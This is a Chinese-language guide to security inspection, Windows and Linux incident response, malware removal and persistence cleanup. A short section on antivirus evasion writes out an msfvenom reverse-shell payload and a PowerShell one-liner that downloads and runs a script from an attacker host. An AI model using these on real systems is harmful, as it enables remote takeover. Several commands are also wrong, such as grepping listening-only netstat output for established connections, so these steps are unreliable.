网络安全实战指南：从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)

频率：安全巡检通常根据系统的重要性和威胁环境确定频率。一般建议每周一次 常规巡检，对于高风险系统（如对外暴露的服务器）可增加至每日一次 ，而低风险系统可调整为每月一次。
目标：发现系统中的潜在威胁，包括系统漏洞 、异常行为 （如未授权访问）、恶意软件以及配置错误，防止攻击者利用这些弱点入侵系统。

2. 巡检的内容是什么以及巡检后如何加固

巡检内容：
1. 系统漏洞扫描：检查操作系统、应用程序是否存在已知漏洞。
2. 日志分析：审查系统日志（如Windows Event Viewer、Linux /var/log），寻找异常登录或操作。
3. 文件完整性检查：验证关键系统文件是否被篡改。
4. 用户权限审计：检查是否存在异常账户或权限提升。
5. 杀毒软件更新：确保杀毒软件签名库和版本是最新的。
加固措施：
1. 修补漏洞：使用补丁管理工具（如Windows Update、yum/apt）修复漏洞。
2. 强化用户权限：删除不必要的管理员账户，使用最小权限原则。
3. 更新杀毒软件：确保实时防护开启，定期全盘扫描。
4. 加密敏感数据：对关键文件和通信启用加密（如TLS、BitLocker）。

二、Windows环境下应急响应的主要流程

1. 流程概述及每个步骤详细解释

Windows应急响应通常包括以下五个步骤：

隔离与遏制：阻止恶意软件扩散。
识别与分析：确定攻击来源和恶意行为。
清除与恢复：移除恶意软件并修复系统。
日志分析：追踪攻击路径和影响。
加固与预防：防止再次入侵。

步骤1：隔离与遏制

目的：防止恶意软件通过网络传播或进一步破坏。
工具与命令：
- 断开网络 ：物理拔网线或运行 netsh interface set interface "Ethernet" disable。
- 启用防火墙 ：netsh advfirewall set allprofiles state on。
详细步骤：
1. 发现异常后立即断开受感染设备的网络连接，但保留电源以便后续分析。
2. 如果无法物理断网，使用防火墙规则阻止外部通信。

步骤2：识别与分析

目的：定位恶意进程、文件和网络活动。
工具与命令：
- Process Explorer：查看进程详细信息。
- Autoruns：检查启动项。
- netstat -ano：列出网络连接和关联进程ID。
详细步骤：
1. 运行 Process Explorer，观察CPU/内存占用异常的进程，右键检查文件路径和数字签名。
2. 使用 Autoruns，查看注册表和计划任务中的可疑启动项。
3. 执行 netstat -ano | findstr ESTABLISHED，记录异常外部IP。

步骤3：清除与恢复

目的：删除恶意软件并修复系统。
工具与命令：
- Malwarebytes：扫描并移除恶意软件。
- sfc /scannow：修复系统文件。
详细步骤：
1. 以安全模式启动系统（F8或msconfig）。
2. 运行 Malwarebytes，执行全盘扫描并隔离威胁。
3. 执行 sfc /scannow，修复被篡改的系统文件。

步骤4：日志分析

目的：了解攻击时间线和手法。
工具与命令：
- Event Viewer：查看系统、安全日志。
- wevtutil ：导出日志，wevtutil qe Security /f:text > security.log。
详细步骤：
1. 打开 Event Viewer，筛选安全日志（如事件ID 4624/4625）。
2. 导出日志进行详细分析，查找异常登录或进程启动。

步骤5：加固与预防

目的：防止类似事件再次发生。
工具与命令：
- Windows Update：安装补丁。
- net user ：重置密码，net user Administrator 新密码。
详细步骤：
1. 运行 Windows Update 更新系统。
2. 检查并删除异常账户，强化密码策略。

2. 结合案例

案例：某企业Windows服务器被勒索病毒感染。
- 隔离：管理员发现异常后立即拔掉网线。
- 识别：使用 Process Explorer 发现进程 svchost.exe 异常占用CPU，路径为 C:\Temp。
- 清除：运行 Malwarebytes，隔离病毒并删除。
- 日志分析 ：在 Event Viewer 中发现攻击者通过RDP（事件ID 4624）登录。
- 加固：关闭RDP（reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f），更新补丁。

三、Linux环境下应急响应的主要流程

1. 流程概述及每个步骤详细解释

Linux应急响应流程与Windows类似，但工具和命令不同：

隔离与遏制：阻止恶意软件扩散。
识别与分析：定位异常进程和网络活动。
清除与恢复：移除恶意软件并修复。
日志分析：追踪攻击路径。
加固与预防：提升安全性。

步骤1：隔离与遏制

目的：限制恶意软件影响范围。
工具与命令：
- ifconfig down ：禁用网络接口，ifconfig eth0 down。
- iptables ：阻断外部流量，iptables -A INPUT -s 恶意IP -j DROP。
详细步骤：
1. 执行 ifconfig eth0 down 或拔网线。
2. 使用 iptables 设置规则，阻止可疑IP。

步骤2：识别与分析

目的：找到恶意进程和连接。
工具与命令：
- top：查看高占用进程。
- ps aux：列出所有进程。
- netstat -tuln：检查网络连接。
详细步骤：
1. 运行 top，记录异常进程PID。
2. 执行 ps aux | grep PID，查看进程详细信息。
3. 使用 netstat -tuln | grep ESTABLISHED，记录可疑连接。

步骤3：清除与恢复

目的：删除恶意软件。
工具与命令：
- ClamAV ：扫描病毒，clamscan -r /。
- kill ：终止进程，kill -9 PID。
详细步骤：
1. 使用 kill -9 PID 终止可疑进程。
2. 运行 clamscan -r / --remove，删除恶意文件。

步骤4：日志分析

目的：确定攻击来源。
工具与命令：
- cat /var/log/auth.log：查看登录记录。
- journalctl：分析系统日志。
详细步骤：
1. 执行 cat /var/log/auth.log | grep "Failed"，查找暴力破解痕迹。
2. 使用 journalctl -u sshd，检查SSH登录事件。

步骤5：加固与预防

目的：防止再次入侵。
工具与命令：
- yum/apt update：更新系统。
- passwd：更改密码。
详细步骤：
1. 执行 yum update -y 或 apt upgrade。
2. 使用 passwd root 重置密码，启用 iptables 防护。

2. 结合案例

案例：Linux服务器被植入挖矿木马。
- 隔离：执行 ifconfig eth0 down。
- 识别：运行 top，发现进程 kswapd0 CPU占用100%，用 ps aux 确认路径 /tmp/xmrig。
- 清除：执行 kill -9 PID 和 rm -f /tmp/xmrig。
- 日志分析 ：cat /var/log/auth.log 显示SSH暴力破解成功。
- 加固：安装 fail2ban，禁用root登录（PermitRootLogin no 在 /etc/ssh/sshd_config）。

四、查杀木马的具体流程（Windows与Linux案例）

1. Windows案例：勒索木马查杀

背景：2023年某企业PC感染勒索木马，文件被加密。
步骤：
1. 隔离网络：
  - 工具：命令行。
  - 命令：netsh interface set interface "Ethernet" disable。
  - 操作：以管理员权限运行CMD，输入命令禁用网络。
2. 识别木马：
  - 工具：Process Explorer、Autoruns。
  - 操作：运行 Process Explorer，发现 ransom.exe 在 C:\Users\Temp，用 Autoruns 找到注册表启动项 HKLM\Software\Microsoft\Windows\CurrentVersion\Run。
3. 分析网络活动：
  - 工具：Wireshark。
  - 操作：启动 Wireshark，设置过滤器 ip.addr == 可疑IP，记录C2服务器地址。
4. 清除木马：
  - 工具：Malwarebytes。
  - 操作：以安全模式运行 Malwarebytes，扫描并删除 ransom.exe。
5. 恢复与加固：
  - 命令：sfc /scannow。
  - 操作：修复系统文件，删除启动项（reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ransom）。

2. Linux案例：挖矿木马查杀

背景：2023年某云服务器感染挖矿木马。
步骤：
1. 隔离网络：
  - 命令：ifconfig eth0 down。
  - 操作：以root权限执行，断开网络。
2. 识别木马：
  - 工具：top、lsof。
  - 命令：top 查看PID，lsof -p PID 确认文件 /usr/local/bin/miner。
3. 检查网络：
  - 命令：netstat -tuln | grep ESTABLISHED。
  - 操作：发现连接至外部挖矿池IP。
4. 清除木马：
  - 工具：ClamAV。
  - 命令：clamscan -r / --remove 删除 /usr/local/bin/miner。
5. 加固系统：
  - 工具：fail2ban。
  - 操作：安装 fail2ban，配置 /etc/fail2ban/jail.local 阻止SSH暴力破解。

五、服务器被入侵后的应急响应

1. Windows案例：Web服务器被植入后门

背景：2023年某Windows IIS服务器被上传WebShell。
步骤：
1. 隔离：netsh advfirewall set allprofiles state on。
2. 检查网络：
  - 命令：netstat -ano | findstr LISTEN。
  - 操作：发现异常端口8080。
3. 列出进程：
  - 命令：tasklist /svc。
  - 操作：找到关联进程 w3wp.exe，用 Process Explorer 确认路径 C:\inetpub\wwwroot\shell.aspx。
4. 检查计划任务：
  - 命令：schtasks /query。
  - 操作：发现后门任务 BackdoorTask。
5. 检查注册表：
  - 命令：reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run。
  - 操作：找到可疑键值。
6. 清除与恢复：
  - 操作：删除 shell.aspx，运行 Malwarebytes，删除任务（schtasks /delete /tn BackdoorTask /f）。
7. 加固：关闭不必要端口，更新IIS补丁。

2. Linux案例：数据库服务器被入侵

背景：2023年某Linux MySQL服务器被植入恶意脚本。
步骤：
1. 隔离：iptables -A INPUT -j DROP。
2. 检查网络：
  - 命令：ss -tuln。
  - 操作：发现异常端口9999。
3. 列出进程：
  - 命令：ps aux | grep 9999。
  - 操作：找到进程 /tmp/backdoor.sh。
4. 检查计划任务：
  - 命令：crontab -l。
  - 操作：发现每分钟执行 /tmp/backdoor.sh。
5. 搜索可疑文件：
  - 命令：find / -name "*.sh" -mtime -7。
  - 操作：定位所有最近修改的脚本。
6. 清除与恢复：
  - 操作：删除 /tmp/backdoor.sh，运行 ClamAV。
7. 加固：禁用root SSH，安装 SELinux。

六、权限维持的常见方式、检测与防护

1. 常见权限维持方式

Windows

注册表启动项 ：HKLM\Software\Microsoft\Windows\CurrentVersion\Run。
计划任务 ：通过 schtasks 创建。
DLL劫持：替换系统DLL。
服务：注册恶意服务（sc create）。

Linux

crontab计划任务：定时执行恶意脚本。
SSH密钥 ：添加至 ~/.ssh/authorized_keys。
SUID/SGID程序：设置权限提升文件。
隐藏文件 ：如 .malware。

2. 检测权限维持手法

Windows

检测项：启动项、计划任务、服务、异常进程。
工具与命令：
- Autoruns：检查所有启动项。
- Sysmon：监控系统行为（需配置规则）。

Linux

检测项：crontab、SSH密钥、SUID文件、隐藏文件。
工具与命令：
- auditd：审计系统调用。
- find / -perm -4000：查找SUID文件。

3. 解决权限维持手法

Windows

命令：
- 删除启动项：reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 键名 /f。
- 删除任务：schtasks /delete /tn 任务名 /f。

Linux

命令：
- 删除crontab：crontab -r。
- 删除SSH密钥：rm ~/.ssh/authorized_keys。

4. 防护后门与权限维持

Windows

工具：AppLocker（限制程序执行）、组策略。

Linux

工具：SELinux（强制访问控制）、AppArmor。

5. 绕过杀毒软件与IWAF

方式：
1. 免杀技术：使用Packer（如UPX）或自定义加密。
2. 内存注入 ：将代码注入合法进程（如 powershell.exe）。
3. 混淆代码：使用Base64编码或多态技术。
详细步骤：
1. 编写恶意代码（如PowerShell脚本）。
2. 使用 msfvenom 生成免杀payload：msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=4444 -f exe -o payload.exe。
3. 注入进程：powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://攻击者IP/payload.ps1')。

七、综合输出与查漏补缺

1. 综合技术手法

安全巡检：漏洞扫描、日志分析、权限审计。
应急响应：Windows（Sysinternals、Malwarebytes）、Linux（top、ClamAV）。
木马查杀：行为分析、最新工具。
权限维持：检测（Autoruns、auditd）、防护（AppLocker、SELinux）。

2. 查漏补缺

最新技术：EDR/XDR、SIEM、容器安全。
失效技术：传统杀毒软件、手动巡检。